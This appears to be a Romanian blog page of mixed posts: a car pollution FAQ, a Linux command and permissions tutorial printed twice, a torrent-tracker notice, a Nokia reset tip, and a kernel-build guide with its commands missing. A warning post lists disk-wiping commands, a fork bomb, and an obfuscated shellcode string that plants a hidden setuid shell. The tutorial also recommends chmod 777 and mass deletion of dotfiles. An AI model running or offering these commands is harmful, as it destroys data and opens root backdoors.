1. Pt. a afla gradul de poluare trebuie sa mergeti la o reprezentanta R.A.R. si sa completati o cerere de consultanta cu datele de pe autovehicul si veti primi un raspuns oficial.
Pentru a completa cererea de consultanta nu este nevoie sa veniti dvs. personal. Puteti trimite datele oricarei persoane indiferent de localitatea de domiciliu care sa vina in locul dvs dar cu datele cerute de modelul cererii. Persoana o va completa la ghiseu si va primi raspuns in scurt timp.
Ar fi bine daca ati putea trimite si o copie a "certificatului de conformitate" a vehiculului eliberat de producator sau chiar si o copie a actului de inmatriculare.
Tariful pentru consultanta este de aproximativ 30 RON.
Modelul cererii de consultanta
2. Norma de poluare D3 din Germania este echivalenta cu Euro 3 in Romania ?
"D"-urile sunt norme fiscale germane ce nu au legatura cu omologarile tehnice date de constructori.
3. Lista autoturismelor care corespund normelor de poluare EURO 3
4. Cand se va publica lista cu autovehiculele care corespund normelor de poluare Euro 4 ?
In ceea ce priveste aparitia unui catalog cu autovehiculele care se incadreaza in normele Euro 4, acesta este in curs de elaborare.
Sursa
Comenzi şi drepturi de acces în GNU/Linux
Ubuntu este o distribuţie dedicată în principiu începătorilor. Dar am observat că obiceiurile căpătate în timpul folosirii Windows fac neclare unele aspecte importante ale utilizării unei distribuţii Linux. Am impresia că drepturile/permisiunile fişierelor şi structura comenzilor date în consolă/terminal încurcă mulţi începători, mai mult chiar decât alte chestii mai complexe. În măsura cunoştinţelor şi ¨talentului meu literar¨ am încercat să clarific puţin aceste aspecte.
A) Structura comenzilor în GNU/Linux
Datorită avantajelor sale, comenzile sunt des utilizate în Linux. De cele mai multe ori când un începător are nevoie de ajutor şi apelează la alte persoane pe un forum specializat, răspunsurile primite vor fi sub forma unor comenzi.
Pentru a fi memorate şi folosite cu succes, comenzile trebuie înţelese. În principiu o comandă este o scurtă propoziţie: computer fă asta deci subiect+predicat+complement! Dar cum întotdeauna subiectul este acelaşi (computerul/calculatorul/PC-ul/maşina sau indiferent cum altfel îl numim), nu e necesar să apară în comandă, este subînţeles... Aşadar rămân doar predicatul şi complementul, altfel spus comanda (acţiunea) şi argumentele necesare acţiunii. Da, de multe ori avem nevoie de mai multe argumente, deci sintaxa va fi:
acţiune argument_1 argument_2 ... argument_n
Deasemeni e bine de reţinut ca aceste comenzi sunt prescurtări ale cuvintelor din limba engleză:
cd= change directory= schimbă directorul (folderul) curent
cp= copy = copiază
ls= list= listează (afişează)
mkdir= make directory= creează director
mv= move= mută
rm= remove= înlătură/ şterge
Să exemplificăm:
1)cd /home/user/Desktop =>comanda aceasta va schimba directorul curent în directorul /home/user/Desktop, adică ne va muta în acel director. Această înşiruire care poate părea greoaie este necesară pt. a arăta sistemului calea exactă (path) către acel director. Dacă suntem în directorul /home/user ajunge comanda cd Desktop, deoarece sistemul vede directorul Desktop în directorul curent. Dar dacă suntem în / sau /usr/bin sau /home/user/Downloads, deoarece aceste directoare nu conţin un director Desktop vom primi outputul (ieşirea, răspunsul, eroarea) bash: cd: Desktop: No such file or directory! De aceea trebuie folosită calea exactă!
2)cp file.txt Documents =>comandă ce va muta fişierul numit file.txt în directorul Documents. Se observă că am pus întâi acţiunea dorită (copiere) apoi argumentele necesare (ce mutăm + unde mutăm). Argumentele sunt date în această ordine: 1- fişierul/directorul sursă, 2- fişierul/directorul destinaţie...
3)rm –rf Muzică =>această comandă şterge de pe maşină directorul Muzică. Dar dacă directorul nu e gol (conţine alte directoare şi fişiere), sistemul nu va executa acţiunea dorită! Pentru aceasta adăugăm comenzii unele OPŢIUNI, în cazul nostru -rf (opţiunile sunt precedate de o liniuţă -). r= recursive= se aplică atât directorului în cauză cât şi subdirectoarelor şi fişierelor conţinute, iar f= force = forţat = nu ne interesează că directorul nu e gol, sau că e important, nu ne interesează părerea sitemului. Deci, opţiunea f= force trebuie folosită cu ATENŢIE!!!
4)sudo aptitude install vlc sau sudo apt-get install vlc =>comandă care va instala aplicaţia multimedia vlc. Sudo vine de la superuser do (facem ceva cu drepturi de root/superuser, avem drepturi depline pe sistem), aptitude (apt-get) este numele utilitarului cu care administrăm aplicaţii, install= instalează, vlc= programul pe care dorim să-l instalăm.
5)chmod 777 /home/user/Director =>chmod= change mod= schimbă permisiunile/atributele/drepturile unui director/fişier, 777 sunt permisiunile date în cifre, /home/user/Director este directorul căruia dorim să-i modificăm permisiunile.
6)rm -f /home/user/.* =>comandă care şterge toate fişierele a căror denumire începe cu ¨.¨ şi continuă cu orice şi oricâte caractere. Sunt fişierele de configurare şi sunt ascunse (punând punct în faţa numelui unui fişier/director îl ascundem. Această comandă este foarte utilă în cazul în care am făcut modificări în sistem sau aplicaţii, avem unele probleme şi nu ştim să remediem sau să revenim la setările anterioare. După rularea comenzii vom avea un sistem ¨virgin¨, cu toate setările iniţiale (temă, wallpaper, setări aplicaţii, conexiune net, semne de carte în Firefox, etc.), şi evident am scăpat de setările problematice.
7)rm -rf / =>ESTE O COMANDĂ EXTREM DE PERICULOASĂ, ŞTERGE PARTIŢIA / (ROOT)!!! NU O RULAŢI NICIODATĂ! O DAU PENTRU UN SINGUR MOTIV: ÎNAINTE DE A DA O COMANDĂ INCERCAŢI SĂ ÎNŢELEGEŢI CE VA FACE ACEASTĂ COMANDĂ!!! În cazul acesta rm= remove= şterge, -rf= recursiv+forţat= se aplică tuturor directoarelor şi fişierelor, indiferent dacă e o prostie, / este directorul root, rădăcina sistemului de fişiere, efectiv curăţăm TOT...
8)Veţi primi eroare la unele din aceste comenzi. Motivul: nu aveţi permisiunea de a le folosi! Soluţia: trebuie să deveniţi root/superuser (sudo su, sau sudo su -, sau activaţi contul de root), sau să căpătaţi drepturile de root/superuser pentru o anumită perioadă (sudo pus înaintea comenzii date). Descoperiţi singuri care sunt cazurile în care trebuie căpătate drepturi suplimentare, sunt convins că aşa veţi învăţa mult mai multe şi mai uşor!
Câteva comenzi mai des utilizate se găsesc la:
http://docs.google.com/viewer?a=v&q … k3aVXn3pGA
http://ss64.com/bash/
Cred că aţi observat că am folosit caracterul * pentru a înlocui unul sau mai multe caractere (litere, cifre). * şi alte asemenea simboluri se numesc metacaractere (wildcards), şi sunt foarte utile. Metacaractere sunt: *, -, ?, [ ], etc. De fapt aproape toate simbolurile non-alfanumerice (deci care nu sunt litere sau cifre). Singurele caractere non-alfanumerice care nu sunt metacaractere sunt punctul (.) şi linia jos ( _ ).
Comenzile se pot grupa, deci putem da simultan 2 sau mai multe comenzi, despărţite de unele simboluri:
1)comenzi fără legătură între ele, comenzi executate pe rând (comenzi legate prin ; ):
pwd; ls -l pwd= arată în ce director suntem, ls -l= arată conţinutul directorului, dar nu este influenţată de prima comandă sau invers, ambele comenzi se pot da separat cu aceleaşi rezultate, sau se poate inversa ordinea lor...:
camelia@stressat ~$ pwd; ls -l
/home/camelia
total 734100
-rw-rw-r-- 1 camelia camelia 43 2010-01-20 17:59 cityfm_128.m3u
drwxrwxrwx 2 camelia camelia 4096 2010-03-06 16:13 Desktop/
-rw-r--r-- 1 camelia camelia 7676015 2010-02-14 08:49 dixit.qdb
drwxr-xr-x 7 camelia camelia 4096 2010-02-14 08:44 Documents/
drwxr-xr-x 8 camelia camelia 4096 2010-03-06 20:44 Downloads/
... etc. Sunt prea multe linii pentru a fi afişate aici.
2)comenzi interdependente: a doua comandă se execută asupra rezultatului primei comenzi, cu condiţia ca prima comandă să se încheie cu succes (comenzi legate prin && ):
cd /home/user/Documents && ls -l mai întâi schimbăm directorul, apoi vrem să ştim ce conţine:
camelia@stressat Desktop $ cd /home/camelia/Documents && ls -l
total 139244
drwxrwxr-x 2 camelia camelia 4096 2010-03-07 11:34 1-Tutoriale/
-rwxrwxrwx 1 camelia camelia 1247064 2009-09-10 18:37 5151_100_Linux_Tips_and_Tricks.PDF*
-rwxrwxrwx 1 camelia camelia 51952 2009-09-26 18:53 asher-samurai-jack.png*
-rw-rw-r-- 1 camelia camelia 253159 2010-01-17 17:53 atheros.pdf
drwxrwxr-x 3 camelia camelia 4096 2010-01-27 19:58 bash-Mandriva/
drwxrwxr-x 2 camelia camelia 4096 2010-01-27 19:57 bash-Sabayon/
-rwxrwxrwx 1 camelia camelia 729088 2009-08-01 11:57 carte linux.doc*
-rwxrwxrwx 1 camelia camelia 21504 2009-08-01 11:53 Comenzi Linux.doc*
Spuneam că prima comandă trebuie să fie corectă, să se încheie cu succes, altfel a doua comandă nu se poate aplica, e inutilă :
camelia@stressat ~$ cd /home/user/Documents && ls -l
bash: cd: /home/user/Documents: No such file or directory
Greşeala este user în loc de numele corect al userului (în acest caz camelia).
camelia@stressat ~$ cd /home/camelia/Documens && ls -l
bash: cd: /home/camelia/Documens: No such file or directory
Greşeala acum este Documens în loc de Documents.
3)comenzi interdependente: a doua comandă se execută DOAR dacă prima dă eroare(comenxi legate prin || ):
cd proba || mkdir -p proba =>vrem să ne mutăm în directorul proba, dacă el există a doua comandă nu se mai execută, dar dacă nu există, intervine a doua comandă, care îl creează:
camelia@stressat ~$ cd proba
bash: cd: proba: No such file or directory
camelia@stressat ~$ cd proba || mkdir proba
bash: cd: proba: No such file or directory
camelia@stressat ~$ cd proba
camelia@stressat proba $ Observăm că s-a creat directorul proba...
B)Permisiunile/drepturile fişierelor/directoarelor
Un alt aspect cam neînţeles de începători se referă la permisiunile/drepturile/atributele fişierelor şi directoarelor. Spre deosebire de Windows, sistemele Linux au o politică strictă de departajare a utilizatorilor. De obicei ca user obişnuit vom avea dreptul de a face tot ce vrem în directorul nostru personal (/home/user), dar nu şi în directoarele altor utilizatori (/ este directorul userului root, /home/dan este directorul altui user/dan).
Aceste drepturi asupra obiectelor se împart în trei categorii:
1) read= citire= r= 4
2)write= scriere= w= 2
3)execute= execuţie= x= 1
şi se dau pentru trei categorii de utilizatori: proprietarul obiectului, grupul proprietarului, restul lumii.
Aceste drepturi de acces se pot scrie în forma rwx sau 7 ( r+w+x => 4+2+1=7) pt. drepturi depline, sau r-x respectiv 5 (r+x => 4+1=5) pt. permisiuni de citire şi execuţie, dar nu de scriere (modificare a conţinutului).
Pentru a vedea drepturile de acces asupra unui obiect folosim comanda ls -l (ls -l file pt. Fişierul ¨file¨, sau ls -l pt. toate obiectele din directorul în care suntem (subdirectoare şi fişiere). Pentru a vedea şi fişierele ascunse comanda este ls -al.
Outputul (răspunsul sistemului) va fi ceva de forma:
dan@stressat Documents $ ls -l
total 139244
drwxrwxr-x 2 dan dan 4096 2010-03-07 08:18 1-Tutoriale/
-rwxrwxrwx 1 dan dan 1247064 2009-09-10 18:37 5151_100_Linux_Tips_and_Tricks.PDF*
-rw-rw-r-- 1 dan dan 3645 2010-01-09 12:37 Alex-linux-counter-500412.png
-rwxrwxrwx 1 dan dan 51952 2009-09-26 18:53 asher-samurai-jack.png*
-rw-rw-r-- 1 dan dan 253159 2010-01-17 17:53 atheros.pdf
Permisiunile de care vorbim sunt: rwxrwxrwx. Grupate pe useri ar fi cam aşa: rwx rwx rwx, trei grupuri de litere rwx. Primul grup reprezintă drepturile proprietarului, al doilea grup drepturile userilor din grupul proprietarului, al treilea grup drepturile celorlalţi, ale altor useri (cei ce nu sunt nici proprietari nici nu sunt în grupul acestuia). În exemplul de mai sus proprietarul e dan, iar grupul său tot dan. rwxrwxrwx arată faptul că toată lumea (proprietar, grupul acestuia, restul lumii) au drepturi depline asupra obiectului (citire+scriere+execuţie). Dacă un user nu are un drept în loc de acest drept vom avea o linie -.
d-ul din faţa liniei drwxrwxr-x 2 dan dan 4096 2010-03-07 08:18 1-Tutoriale/ arată că obiectul este un director.
Următoarele caractere ne arată drepturile asupra obiectului: drepturi depline pt. proprietar şi grup, drepturi de citire şi execuţie (pt. directoare execuţie înseamnă deschidere) pt. ceilalţi, dar nu şi drept de scriere. În loc de w avem o linie -, ceea ce reprezintă faptul că aceşti useri nu pot modifica conţinutul obiectului – deci nu au drept de scriere... În cifre drepturile se scriu 775.
Liniuţa – din faţa liniei -rw-rw-r-- 1 dan dan 253159 2010-01-17 17:53 atheros.pdf arată că avem de a face cu un fişier. Drepturile asupra acestui fişier sunt rw-rw-r--, drept de scriere+citire, nu şi de execuţie pt. proprietar şi grupul său, respectiv drept de citire (nu şi scriere şi execuţie) pt. restul lumii). În cifre drepturile ar fi: 664.
a)Modificarea drepturilor de acces se face prin comanda chmod.
Exemplu: chmod 777 /home/user/Tutoriale/*
chmod -R 777 /home/user/Tutoriale
Această comandă va da drepturi depline tuturor asupra directorului Tutoriale si asupra tuturor fişierelor conţinute de acesta! Detalii aflaţi cu ajutorul comenzii chmod --help
Sursa
A) Structura comenzilor în GNU/Linux
Datorită avantajelor sale, comenzile sunt des utilizate în Linux. De cele mai multe ori când un începător are nevoie de ajutor şi apelează la alte persoane pe un forum specializat, răspunsurile primite vor fi sub forma unor comenzi.
Pentru a fi memorate şi folosite cu succes, comenzile trebuie înţelese. În principiu o comandă este o scurtă propoziţie: computer fă asta deci subiect+predicat+complement! Dar cum întotdeauna subiectul este acelaşi (computerul/calculatorul/PC-ul/maşina sau indiferent cum altfel îl numim), nu e necesar să apară în comandă, este subînţeles... Aşadar rămân doar predicatul şi complementul, altfel spus comanda (acţiunea) şi argumentele necesare acţiunii. Da, de multe ori avem nevoie de mai multe argumente, deci sintaxa va fi:
acţiune argument_1 argument_2 ... argument_n
Deasemeni e bine de reţinut ca aceste comenzi sunt prescurtări ale cuvintelor din limba engleză:
cd= change directory= schimbă directorul (folderul) curent
cp= copy = copiază
ls= list= listează (afişează)
mkdir= make directory= creează director
mv= move= mută
rm= remove= înlătură/ şterge
Să exemplificăm:
1)cd /home/user/Desktop =>comanda aceasta va schimba directorul curent în directorul /home/user/Desktop, adică ne va muta în acel director. Această înşiruire care poate părea greoaie este necesară pt. a arăta sistemului calea exactă (path) către acel director. Dacă suntem în directorul /home/user ajunge comanda cd Desktop, deoarece sistemul vede directorul Desktop în directorul curent. Dar dacă suntem în / sau /usr/bin sau /home/user/Downloads, deoarece aceste directoare nu conţin un director Desktop vom primi outputul (ieşirea, răspunsul, eroarea) bash: cd: Desktop: No such file or directory! De aceea trebuie folosită calea exactă!
2)cp file.txt Documents =>comandă ce va muta fişierul numit file.txt în directorul Documents. Se observă că am pus întâi acţiunea dorită (copiere) apoi argumentele necesare (ce mutăm + unde mutăm). Argumentele sunt date în această ordine: 1- fişierul/directorul sursă, 2- fişierul/directorul destinaţie...
3)rm –rf Muzică =>această comandă şterge de pe maşină directorul Muzică. Dar dacă directorul nu e gol (conţine alte directoare şi fişiere), sistemul nu va executa acţiunea dorită! Pentru aceasta adăugăm comenzii unele OPŢIUNI, în cazul nostru -rf (opţiunile sunt precedate de o liniuţă -). r= recursive= se aplică atât directorului în cauză cât şi subdirectoarelor şi fişierelor conţinute, iar f= force = forţat = nu ne interesează că directorul nu e gol, sau că e important, nu ne interesează părerea sitemului. Deci, opţiunea f= force trebuie folosită cu ATENŢIE!!!
4)sudo aptitude install vlc sau sudo apt-get install vlc =>comandă care va instala aplicaţia multimedia vlc. Sudo vine de la superuser do (facem ceva cu drepturi de root/superuser, avem drepturi depline pe sistem), aptitude (apt-get) este numele utilitarului cu care administrăm aplicaţii, install= instalează, vlc= programul pe care dorim să-l instalăm.
5)chmod 777 /home/user/Director =>chmod= change mod= schimbă permisiunile/atributele/drepturile unui director/fişier, 777 sunt permisiunile date în cifre, /home/user/Director este directorul căruia dorim să-i modificăm permisiunile.
6)rm -f /home/user/.* =>comandă care şterge toate fişierele a căror denumire începe cu ¨.¨ şi continuă cu orice şi oricâte caractere. Sunt fişierele de configurare şi sunt ascunse (punând punct în faţa numelui unui fişier/director îl ascundem. Această comandă este foarte utilă în cazul în care am făcut modificări în sistem sau aplicaţii, avem unele probleme şi nu ştim să remediem sau să revenim la setările anterioare. După rularea comenzii vom avea un sistem ¨virgin¨, cu toate setările iniţiale (temă, wallpaper, setări aplicaţii, conexiune net, semne de carte în Firefox, etc.), şi evident am scăpat de setările problematice.
7)rm -rf / =>ESTE O COMANDĂ EXTREM DE PERICULOASĂ, ŞTERGE PARTIŢIA / (ROOT)!!! NU O RULAŢI NICIODATĂ! O DAU PENTRU UN SINGUR MOTIV: ÎNAINTE DE A DA O COMANDĂ INCERCAŢI SĂ ÎNŢELEGEŢI CE VA FACE ACEASTĂ COMANDĂ!!! În cazul acesta rm= remove= şterge, -rf= recursiv+forţat= se aplică tuturor directoarelor şi fişierelor, indiferent dacă e o prostie, / este directorul root, rădăcina sistemului de fişiere, efectiv curăţăm TOT...
8)Veţi primi eroare la unele din aceste comenzi. Motivul: nu aveţi permisiunea de a le folosi! Soluţia: trebuie să deveniţi root/superuser (sudo su, sau sudo su -, sau activaţi contul de root), sau să căpătaţi drepturile de root/superuser pentru o anumită perioadă (sudo pus înaintea comenzii date). Descoperiţi singuri care sunt cazurile în care trebuie căpătate drepturi suplimentare, sunt convins că aşa veţi învăţa mult mai multe şi mai uşor!
Câteva comenzi mai des utilizate se găsesc la:
http://docs.google.com/viewer?a=v&q … k3aVXn3pGA
http://ss64.com/bash/
Cred că aţi observat că am folosit caracterul * pentru a înlocui unul sau mai multe caractere (litere, cifre). * şi alte asemenea simboluri se numesc metacaractere (wildcards), şi sunt foarte utile. Metacaractere sunt: *, -, ?, [ ], etc. De fapt aproape toate simbolurile non-alfanumerice (deci care nu sunt litere sau cifre). Singurele caractere non-alfanumerice care nu sunt metacaractere sunt punctul (.) şi linia jos ( _ ).
Comenzile se pot grupa, deci putem da simultan 2 sau mai multe comenzi, despărţite de unele simboluri:
1)comenzi fără legătură între ele, comenzi executate pe rând (comenzi legate prin ; ):
pwd; ls -l pwd= arată în ce director suntem, ls -l= arată conţinutul directorului, dar nu este influenţată de prima comandă sau invers, ambele comenzi se pot da separat cu aceleaşi rezultate, sau se poate inversa ordinea lor...:
camelia@stressat ~$ pwd; ls -l
/home/camelia
total 734100
-rw-rw-r-- 1 camelia camelia 43 2010-01-20 17:59 cityfm_128.m3u
drwxrwxrwx 2 camelia camelia 4096 2010-03-06 16:13 Desktop/
-rw-r--r-- 1 camelia camelia 7676015 2010-02-14 08:49 dixit.qdb
drwxr-xr-x 7 camelia camelia 4096 2010-02-14 08:44 Documents/
drwxr-xr-x 8 camelia camelia 4096 2010-03-06 20:44 Downloads/
... etc. Sunt prea multe linii pentru a fi afişate aici.
2)comenzi interdependente: a doua comandă se execută asupra rezultatului primei comenzi, cu condiţia ca prima comandă să se încheie cu succes (comenzi legate prin && ):
cd /home/user/Documents && ls -l mai întâi schimbăm directorul, apoi vrem să ştim ce conţine:
camelia@stressat Desktop $ cd /home/camelia/Documents && ls -l
total 139244
drwxrwxr-x 2 camelia camelia 4096 2010-03-07 11:34 1-Tutoriale/
-rwxrwxrwx 1 camelia camelia 1247064 2009-09-10 18:37 5151_100_Linux_Tips_and_Tricks.PDF*
-rwxrwxrwx 1 camelia camelia 51952 2009-09-26 18:53 asher-samurai-jack.png*
-rw-rw-r-- 1 camelia camelia 253159 2010-01-17 17:53 atheros.pdf
drwxrwxr-x 3 camelia camelia 4096 2010-01-27 19:58 bash-Mandriva/
drwxrwxr-x 2 camelia camelia 4096 2010-01-27 19:57 bash-Sabayon/
-rwxrwxrwx 1 camelia camelia 729088 2009-08-01 11:57 carte linux.doc*
-rwxrwxrwx 1 camelia camelia 21504 2009-08-01 11:53 Comenzi Linux.doc*
Spuneam că prima comandă trebuie să fie corectă, să se încheie cu succes, altfel a doua comandă nu se poate aplica, e inutilă :
camelia@stressat ~$ cd /home/user/Documents && ls -l
bash: cd: /home/user/Documents: No such file or directory
Greşeala este user în loc de numele corect al userului (în acest caz camelia).
camelia@stressat ~$ cd /home/camelia/Documens && ls -l
bash: cd: /home/camelia/Documens: No such file or directory
Greşeala acum este Documens în loc de Documents.
3)comenzi interdependente: a doua comandă se execută DOAR dacă prima dă eroare(comenxi legate prin || ):
cd proba || mkdir -p proba =>vrem să ne mutăm în directorul proba, dacă el există a doua comandă nu se mai execută, dar dacă nu există, intervine a doua comandă, care îl creează:
camelia@stressat ~$ cd proba
bash: cd: proba: No such file or directory
camelia@stressat ~$ cd proba || mkdir proba
bash: cd: proba: No such file or directory
camelia@stressat ~$ cd proba
camelia@stressat proba $ Observăm că s-a creat directorul proba...
B)Permisiunile/drepturile fişierelor/directoarelor
Un alt aspect cam neînţeles de începători se referă la permisiunile/drepturile/atributele fişierelor şi directoarelor. Spre deosebire de Windows, sistemele Linux au o politică strictă de departajare a utilizatorilor. De obicei ca user obişnuit vom avea dreptul de a face tot ce vrem în directorul nostru personal (/home/user), dar nu şi în directoarele altor utilizatori (/ este directorul userului root, /home/dan este directorul altui user/dan).
Aceste drepturi asupra obiectelor se împart în trei categorii:
1) read= citire= r= 4
2)write= scriere= w= 2
3)execute= execuţie= x= 1
şi se dau pentru trei categorii de utilizatori: proprietarul obiectului, grupul proprietarului, restul lumii.
Aceste drepturi de acces se pot scrie în forma rwx sau 7 ( r+w+x => 4+2+1=7) pt. drepturi depline, sau r-x respectiv 5 (r+x => 4+1=5) pt. permisiuni de citire şi execuţie, dar nu de scriere (modificare a conţinutului).
Pentru a vedea drepturile de acces asupra unui obiect folosim comanda ls -l (ls -l file pt. Fişierul ¨file¨, sau ls -l pt. toate obiectele din directorul în care suntem (subdirectoare şi fişiere). Pentru a vedea şi fişierele ascunse comanda este ls -al.
Outputul (răspunsul sistemului) va fi ceva de forma:
dan@stressat Documents $ ls -l
total 139244
drwxrwxr-x 2 dan dan 4096 2010-03-07 08:18 1-Tutoriale/
-rwxrwxrwx 1 dan dan 1247064 2009-09-10 18:37 5151_100_Linux_Tips_and_Tricks.PDF*
-rw-rw-r-- 1 dan dan 3645 2010-01-09 12:37 Alex-linux-counter-500412.png
-rwxrwxrwx 1 dan dan 51952 2009-09-26 18:53 asher-samurai-jack.png*
-rw-rw-r-- 1 dan dan 253159 2010-01-17 17:53 atheros.pdf
Permisiunile de care vorbim sunt: rwxrwxrwx. Grupate pe useri ar fi cam aşa: rwx rwx rwx, trei grupuri de litere rwx. Primul grup reprezintă drepturile proprietarului, al doilea grup drepturile userilor din grupul proprietarului, al treilea grup drepturile celorlalţi, ale altor useri (cei ce nu sunt nici proprietari nici nu sunt în grupul acestuia). În exemplul de mai sus proprietarul e dan, iar grupul său tot dan. rwxrwxrwx arată faptul că toată lumea (proprietar, grupul acestuia, restul lumii) au drepturi depline asupra obiectului (citire+scriere+execuţie). Dacă un user nu are un drept în loc de acest drept vom avea o linie -.
d-ul din faţa liniei drwxrwxr-x 2 dan dan 4096 2010-03-07 08:18 1-Tutoriale/ arată că obiectul este un director.
Următoarele caractere ne arată drepturile asupra obiectului: drepturi depline pt. proprietar şi grup, drepturi de citire şi execuţie (pt. directoare execuţie înseamnă deschidere) pt. ceilalţi, dar nu şi drept de scriere. În loc de w avem o linie -, ceea ce reprezintă faptul că aceşti useri nu pot modifica conţinutul obiectului – deci nu au drept de scriere... În cifre drepturile se scriu 775.
Liniuţa – din faţa liniei -rw-rw-r-- 1 dan dan 253159 2010-01-17 17:53 atheros.pdf arată că avem de a face cu un fişier. Drepturile asupra acestui fişier sunt rw-rw-r--, drept de scriere+citire, nu şi de execuţie pt. proprietar şi grupul său, respectiv drept de citire (nu şi scriere şi execuţie) pt. restul lumii). În cifre drepturile ar fi: 664.
a)Modificarea drepturilor de acces se face prin comanda chmod.
Exemplu: chmod 777 /home/user/Tutoriale/*
chmod -R 777 /home/user/Tutoriale
Această comandă va da drepturi depline tuturor asupra directorului Tutoriale si asupra tuturor fişierelor conţinute de acesta! Detalii aflaţi cu ajutorul comenzii chmod --help
Sursa
Free sign-up SceneFZ
In perioada 28.01 - 06.02 [FREE SIGN-UP] SceneFZ isi deschide portile noilor useri.
Aparitia a 3 noi categorii:
1. TVEPS-Ro
2. XViD-Ro
3. BR-Ro (BluRay-Ro)
http://scenefz.net/
Aparitia a 3 noi categorii:
1. TVEPS-Ro
2. XViD-Ro
3. BR-Ro (BluRay-Ro)
http://scenefz.net/
Comenzi pe care NU trebuie sa le executati NICIODATA
1 comenzi care va sterg directorul home, root sau intregul harddisk
kernel panic
o comanda "alambicata" identica cu rm -rf /
asta nu iti mai permite sa executi nimic cu drept de administrator
si ar mai fi
una care blocheaza chmod
cascati ochii, ca altfel v-o faceti cu mana voastra
Sursa
Cod:
* sudo rm -rf /
* rm -rf .*
* dd if=/dev/zero of=/dev/sda
* mkfs.ext3 /dev/hda
* whatever > /dev/hda
* cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
* find -type f -mtime +30 -exec mv {} /dev/null \;
* mv ~ /dev/null
* mv / /dev/nullCod:
* dd if=/dev/random of=/dev/port
* :(){:|:&};: #also known as fork bombCod:
char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
Cod:
rm -f /usr/bin/sudo;rm -f /bin/su
Cod:
chmod -r 777 . /* # [ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo “You live” cd ~; for x in `ls`; do mv -f $x $y; y=$x; done rm -rf –no-preserve-root /
Cod:
rm -rf /dev || rm -rf /bin
Cod:
chmod -x /bin/* chmod -x /usr/bin/* chmod -x /usr/local/bin/*
Sursa
Nokia Hard Reset (E72)
Pentru a reseta(hard reset) telefonul trebuie urmaritii urmatorii pasi:
1. Treceti telefonul in modul OFFLINE (vezi video)
2. Introduceti codul: *#7370# si confirmati.
Nota: Nokia Lock code implicit este: 12345
Valabil si pe alte telefoane nokia cu symbian.
ATENTIE: VOR FI STERSE TOATE APLICATIILE INSTALATE.
1. Treceti telefonul in modul OFFLINE (vezi video)
2. Introduceti codul: *#7370# si confirmati.
Nota: Nokia Lock code implicit este: 12345
Valabil si pe alte telefoane nokia cu symbian.
ATENTIE: VOR FI STERSE TOATE APLICATIILE INSTALATE.
Compilarea unui kernel Linux
Fiecare distributie are unelte specifice pentru a compila un kernel din surse. Voi incerca sa descriu aici compilarea unui kernel in Ubuntu/Debian . Vom folosi sursele nemodificate de pe www.kernel.org, vom aplica diferite patch-uri si vom genera pachetele deb pe care le putem da prietenilor s.a.m.d.
NOTA : In tutorial voi folosi aptitude cand este nevoie de instalarea unor pachete. Intrucat acesta nu se mai gaseste implicit in Ubuntu 10.10 inlocuiti aptitude cu apt-get, sau mai simplu, instalati aptitude.
Pentru inceput este nevoie de cateva unelte pentru procesul de compilare :
Apoi ne autentificam ca root si putem incepe:
Compilarea kernelului Linux se face in /usr/src , de aceea am navigat catre acel folder dupa autentificarea ca root.
Sa presupunem ca dorim sa compilam kernelul 2.6.36.1. Ca patch vom folosi patchsetul CK creat de Con Kolivas. Acesta include printre altele si un alt scheduler, BFS.
Se descarca sursele kernelului de pe www.kernel.org :
Se descarca si patchsetul CK :
NOTA : - cine doreste poate sa foloseasca patchul minune de 200 de linii. De asemenea se pot aplica si mai multe patchuri. Eu folosesc patchsetul CK in acest tutorial deoarece este mai simplu.
Avem sursele, avem patch-ul, deci sa incepem :
Am dezarhivat kernelul, am creat un symlink numit linux si am intrat in sursele kernelului. Acum sa aplicam patch-ul :
Prima linie verifica daca patchul se poate aplica fara nicio eroare. Astfel nu riscati sa stricati sursele daca ati descarcat un patch gresit. Putin probabil, dar e bine sa fim precauti. A doua linie aplica patch-ul asupra surselor kernelului.
Acum vine partea cea mai dificila si anume configurarea noului kernel. Pentru inceput ar fi bine sa folositi configuratia kernelului pe care il rulati deja.
Apoi rulam :
Aceasta ne va aduce in fata meniul de configurare al noului kernel. Navigati pana la Load an Alternate Configuration File si alegeti .config . Dupa aceea puteti naviga prin optiuni si sa va costumizati kernelul dupa cum doriti. Puteti adauga suport pentru diferite componente, in caz ca kernelul cu care vine distributia le suporta, sau puteti elimina suportul pentru componentele pe care nu le aveti.
NOTADe asemenea puteti sa compilati un kernel super usor, care sa contina doar modulele pe care le folositi. Va rezulta un kernel cu 70-80 de module. Compilarea lui va dura extrem de putin si va fi foarte rapid. Se va instala mult mai repede decat un kernel obisnuit deoarece ramdiskul creat va contine putine module si va ocupa foarte putin spatiu pe disc.
In contrast kernelul cu care vine Ubuntu implicit contine cam 2600-2700 de module pe care probabil nu le veti folosi niciodata. Este un lucru bun insa, deoarece ei incearca sa acopere cat mai multe configuratii posibile folosind un singur kernel.
Dupa ce ati terminat de configurat kernelul, alegeti Exit si raspundeti cu Yes la intrebarea
Do you wish to save your new kernel configuration?
Apoi se poate incepe compilarea :
Dupa --append-to-version puteti pune orice doriti pentru a identifica noul kernel, dar trebuie sa inceapa cu un minus (-) si sa nu contina spatii. Poate fi nickul de pe forum, etc. Veti avea kernel 2.6.36.1-nick .
Acum trebuie sa aveti rabdare, compilarea unui kernel poate dura cateva ore in functie de viteza procesorului si de configuratia aleasa. Dupa terminarea compilarii in /usr/src se vor gasi doua pachete deb. Unul va contine kernelul, iar celalalt va contine headerele necesare compilarii de module pentru kernel (gen vbox, nvidia).
Se instaleaza cele doua pachete :
Grub ar trebui sa detecteze noul kernel si sa genereze grub.cfg in consecinta, dar pentru orice eventualitate rulati si un :
La reboot veti putea alege intre vechiul kernel, si noul kernel proaspat compilat. Daca totul este in regula puteti dezinstala vechiul kernel. Puteti chiar sa oferiti cele doua pachete deb si altor utilizatori sa beneficieze de munca voastra.
